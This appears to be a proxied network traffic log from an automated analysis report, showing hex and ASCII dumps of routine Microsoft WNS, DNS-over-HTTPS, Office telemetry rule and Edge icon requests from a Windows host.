2024-11-23 06:09:45 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 51 33 4b 56 62 42 64 33 75 55 47 38 4f 53 61 4b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 32 66 30 36 35 34 66 37 64 39 37 35 31 36 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 36 6d 33 39 2f 70 35 62 71 4b 33 4e 2b 6b 31 2f 6d 71 42 62 4a 55 63 34 6f 4d 32 4f 38 72 56 46 47 67 45 31 57 59 51 58 7a 4d 45 54 45 53 4c 64 78 61 30 61 4c 51 6d 79 35 5a 69 39 4e 52 39 35 34 2b 5a 2b 58 6f 72 68 48 59 36 74 36 33 73 53 2f 72 67 50 68 58 36 6f 4a 79 2f 61 71 61 6d 50 43 5a 31 54 74 62 61 65 4f 5a 46 69 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Q3KVbBd3uUG8OSaK.2Context: 22f0654f7d975167<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR6m39/p5bqK3N+k1/mqBbJUc4oM2O8rVFGgE1WYQXzMETESLdxa0aLQmy5Zi9NR954+Z+XorhHY6t63sS/rgPhX6oJy/aqamPCZ1TtbaeOZFi
2024-11-23 06:09:45 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 51 33 4b 56 62 42 64 33 75 55 47 38 4f 53 61 4b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 32 66 30 36 35 34 66 37 64 39 37 35 31 36 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: Q3KVbBd3uUG8OSaK.3Context: 22f0654f7d975167<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-23 06:09:45 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-23 06:09:45 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 68 6b 37 31 58 34 66 46 62 6b 65 61 42 32 70 57 38 6f 44 73 34 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: hk71X4fFbkeaB2pW8oDs4g.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.6	49852	162.159.61.3	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-23 06:09:45 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcomA)QM
2024-11-23 06:09:45 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 23 Nov 2024 06:09:45 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e6efe01edae4366-EWR alt-svc: h3=":443"; ma=86400
2024-11-23 06:09:45 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 01 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0d a1 00 2d 12 65 64 67 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 0b 64 75 61 6c 2d 61 2d 30 30 33 36 08 61 2d 6d 73 65 64 67 65 03 6e 65 74 00 c0 4f 00 06 00 01 00 00 00 81 00 23 03 6e 73 31 c0 4f 06 6d 73 6e 68 73 74 c0 11 78 2b 22 e5 00 00 07 08 00 00 03 84 00 24 ea 00 00 00 00 f0 00 00 29 04 d0 00 00 00 00 01 3d 00 0c 01 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcomA-edge-microsoft-comdual-a-0036a-msedgenetO#ns1Omsnhstx+"$)=9

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.6	49883	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:45 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:45 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 6b91e280-c01e-00a2-4f0a-3d2327000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060945Z-178bfbc474bh5zbqhC1NYCkdug00000003vg00000000q6p6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:45 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.6	49886	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:45 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:45 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060945Z-178bfbc474bmqmgjhC1NYCy16c0000000450000000007q76 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:45 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.6	49885	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:46 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:45 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 1e280d2f-401e-0029-0d7f-3b9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060945Z-174c587ffdfgcs66hC1TEB69cs00000002bg00000000de8p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:46 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.6	49887	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:46 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:45 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 6b17e566-f01e-003f-7a44-3cd19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060945Z-15b8b599d88z9sc7hC1TEBkr4w00000002sg0000000017ag x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:46 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.6	49884	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:46 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:45 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 907655e5-001e-0065-594b-3c0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060945Z-15b8b599d88hr8sfhC1TEBbca400000002bg00000000dasv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:46 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.6	49888	13.107.246.40	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	438	OUT	GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:46 UTC	536	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:46 GMT Content-Type: image/png Content-Length: 1579 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT ETag: 0x8DBDCB5DE99522A x-ms-request-id: f05f392f-b01e-0075-322a-3defbc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241123T060946Z-174c587ffdftv9hphC1TEBm29w00000002fg0000000079yz Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:46 UTC	1579	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.6	49890	13.107.246.40	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	431	OUT	GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:46 UTC	536	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:46 GMT Content-Type: image/png Content-Length: 1966 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT ETag: 0x8DBDCB5EC122A94 x-ms-request-id: f9357370-101e-005a-312a-3d6e86000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241123T060946Z-178bfbc474b9xljthC1NYCtw9400000003z0000000008cur Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-23 06:09:46 UTC	1966	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNntw<T:A-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.6	49889	13.107.246.40	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	433	OUT	GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:46 UTC	543	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:46 GMT Content-Type: image/png Content-Length: 1751 Connection: close Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT ETag: 0x8DBCEA8D5AACC85 x-ms-request-id: f1aae79f-401e-0049-1b4a-3d5b67000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241123T060946Z-15b8b599d88hd9g7hC1TEBp75c00000002cg00000000hstz Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-23 06:09:46 UTC	1751	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.6	49893	13.107.246.40	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	433	OUT	GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:46 UTC	536	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:46 GMT Content-Type: image/png Content-Length: 1427 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT ETag: 0x8DBDCB5EF021F8E x-ms-request-id: 4a51215c-501e-003b-2b2a-3d2a59000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241123T060946Z-178bfbc474bpscmfhC1NYCfc2c00000002pg0000000077g9 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
